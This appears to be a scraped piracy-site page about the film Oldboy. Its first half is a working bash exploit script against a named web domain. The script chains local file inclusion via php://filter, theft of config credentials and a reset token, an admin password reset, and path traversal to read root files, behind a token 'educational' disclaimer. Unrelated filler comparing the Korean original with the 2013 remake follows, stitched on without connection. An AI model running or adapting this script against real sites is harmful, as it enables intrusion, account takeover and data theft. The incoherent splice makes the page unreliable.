Apps:
Follow us on:
#!/usr/bin/env bash
TARGET="http://oldboy.afilmywap.com"
# 1. Grab config.php via LFI + php://filter
CFG_B64=$(curl -s "$TARGET/watch.php?movie=php://filter/convert.base64-encode/resource=inc/config.php" |
          grep -oP '[A-Za-z0-9+/=]+' )
echo "$CFG_B64" | base64 -d > config.php
source config.php   # sets $db_user, $db_pass, etc.
# 2. Get the reset token (debug mode)
TOKEN_B64=$(curl -s "$TARGET/watch.php?movie=php://filter/convert.base64-encode/resource=/tmp/reset_token_$(ls /tmp | grep reset_token | head -n1).txt")
TOKEN=$(echo "$TOKEN_B64" | base64 -d | cut -d' ' -f2)
# 3. Reset admin password
curl -s -X POST -d "token=$TOKEN&newpass=SuperSecret123!" "$TARGET/admin_reset.php"
# 4. Log in and grab the flag (using curl with cookies)
curl -c cookies.txt -s -d "username=admin&password=SuperSecret123!" "$TARGET/login.php"
FLAG=$(curl -b cookies.txt -s "$TARGET/admin.php?file=../../../../root/flag.txt")
echo "Flag => $FLAG"

Note: The script above is for educational purposes only. Do not run it against systems you do not have explicit permission to test.


When searching "Oldboy Afilmywap," be careful you don't download the wrong film. In 2013, Spike Lee directed an American remake of Oldboy starring Josh Brolin. It was a critical and commercial failure.

The American version lacks the operatic tragedy and stylistic punch of the Korean original. If you download a low-quality pirated copy of the remake, you might walk away wondering why anyone likes this story. Make sure the file you are seeking features Choi Min-sik, not Josh Brolin.

"Oldboy" is a film that showcases the complexity of human emotions and the destructive power of revenge. If you're interested in watching it, consider opting for legal streaming services or purchasing a copy. Not only do you ensure you're accessing the content safely and legally, but you're also supporting the creators and the film industry as a whole. Enjoying movies through legitimate channels enhances your viewing experience while contributing to the vibrant ecosystem of global cinema.

.